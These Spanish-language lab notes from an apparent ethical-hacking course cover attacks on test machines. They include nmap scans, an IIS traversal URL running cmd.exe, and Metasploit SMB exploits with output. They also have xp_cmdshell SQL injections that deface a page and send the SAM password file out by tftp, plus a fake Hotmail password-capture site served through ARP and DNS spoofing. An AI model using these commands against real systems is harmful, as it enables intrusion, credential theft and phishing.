Sei sulla pagina 1di 4

1-------telnet 10.10.10.

45 80 (intro)
HEAD / HTTP/1.0 (intro)
se obtiene la info de el sitio
- probar tambien herramienta gr{afica httprint.
2----------directorio transversal---http://10.10.10.229/scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\
http://10.10.10.229/scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\sql
3----------directorio transversal---http://10.10.10.229/scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\
http://10.10.10.229/scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\sql
4----------ejemplos nmap (probar en windows y backtrack):
nmap -v -A 10.21.13.21 (-v: verbos -A All todos)
nmap -sS 10.10.10.1 (stealth scan)
nmap -O 10.10.10.1 (os detection)
nmap -sS -O 10.10.10.1 (os detection) (fingerprinting) stealth si funciona con
windows
nmap -sU 10.10.10.1 (udp scan)
nmap -sI 10.10.10.1:1 10.10.10.45 (zombie machine
)
mio: nmap -sI 10.10.10.45:1 10.10.10.71 (checar cool)
escribiendo en archivo
nmap -sS 10.10.10.45 -oA x (genera el archivo x.nmap, -oA indica el formato de
salida , tosho)
lo vemos con
cat x.nmap
scan mas rapido: tcp
mas seguro: idle

5----null session
-enumeracion
null session....contramedida apagar port 139 netbios
windows: C:\>net use \\192.34.34.2\IPC$ "" /u:""
net use \\targetIP\ipc$ "" /u:""
Windows: net use u:
null session con linux
smbclient -L hostName -I targetIP
Linux: $ smbclient \\\\target\\ipc\$ ""

U ""

smbclient -L hostName -I targetIP


getact
5------------------------metaexploit
*********
en backtrack
/pentest/exploits/framework3/#./msfconsole
http://10.10.10.229/scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\WINNT
--search windows/shell_bind_tcp
use windows/smb/ms08_067_netapi
show options
set rhost 10.21.23.11
set payload windows/vncinject/reverse_tcp
show options
set lhost 10.10.10.225
exploit
en windows
msf > use windows/smb/ms06_040_netapi
msf exploit(ms06_040_netapi) > set lhost 10.10.10.224
lhost => 10.10.10.224
msf exploit(ms06_040_netapi) > exploit
[*] Started reverse handler
[*] Detected a Windows 2000 target
[*] Binding to 4b324fc8-1670-01d3-1278-5a47bf6ee188:3.0@ncacn_np:10.10.10.229[\B
ROWSER] ...
[*] Bound to 4b324fc8-1670-01d3-1278-5a47bf6ee188:3.0@ncacn_np:10.10.10.229[\BRO
WSER] ...
[*] Building the stub data...
[*] Calling the vulnerable function...
[*] Transmitting intermediate stager for over-sized stage...(89 bytes)
[*] Sending stage (2834 bytes)
[*] Sleeping before handling stage...
[*] Uploading DLL (327693 bytes)...
[*] Upload completed.
[*] Starting local TCP relay on 127.0.0.1:5900...
[*] Local TCP relay started.
[*] Launched vnciewer in the background.
[*] VNC Server session 1 opened (10.10.10.224:4444 -> 10.10.10.229:1046)
**********
usar SMBDIE para enviar ping de la muerte a vicktim2km
6----------iny sql----------------------

blah';exec master..xp_cmdshell "echo you-are-defaced > c:\sql\Client.htm" -blah';exec master..xp_cmdshell "tftp -i 10.10.10.155 put c:\winnt\repair\SAM SAM
" -blah';exec master..xp_cmdshell "tftp -i 10.10.10.155 get PageRc.htm c:/sql/Clien
t.htm" -blah';EXEC master..sp_makewebtask "c:\sql\query2.html","select * from sysdatabas
es" -blah';EXEC master..sp_makewebtask "c:\sql\query3.html","select * from juggybank.
information_schema.tables" -7---------------montar un sitio ficticio x para guardar la contrasea de usuario.
practica: se ocupan cehstudent backtrack 4 victima vicktimwin2l
1. sitio ficticio
2. montar sitio
3. probarlo (checar script para guardar lo que esta tecleando el usuario , contr
asea).
4. arp poisonning.
5. DNS poisonning.
router <------------> victima
atacante
servidor montado en ceh student
+envenenamiento arp +dnsspoofing
1. copiar la carpeta de hotmail scripts a c , explicar lo del scrip (version vie
ja).
2. cambiar la carpeta por defecto, habilitar opcion de escribir.
3. permisos de escritura en la parpeta hotmail a IUSR
4. probar el sitio en forma local y de la maquina victima.
***dsniffpackage****
primero: para que no se nos quede ese trafico:
#echo 1 >/proc/sys/net/ipv4/ip_forward
ataque de arpspoof:
de la victima al router
del router a la victima
#arpspoof -i eth0 -t 10.10.10.224 10.10.10.1
de router a la victima
del router a la victima
#arpspoof -i eth0 -t 10.10.10.1 10.10.10.224
creamos el archivo host con pico
editamos

---creamos y editamos el archivo host


10.10.10.224 www.hotmail.com
class: 10.21.33.2
guardamos y salimos
corremos
#dnsspoof -i eth0 -f host
en victimaxp para que lo haga mas rapido
ipconfig -flushdns

Potrebbero piacerti anche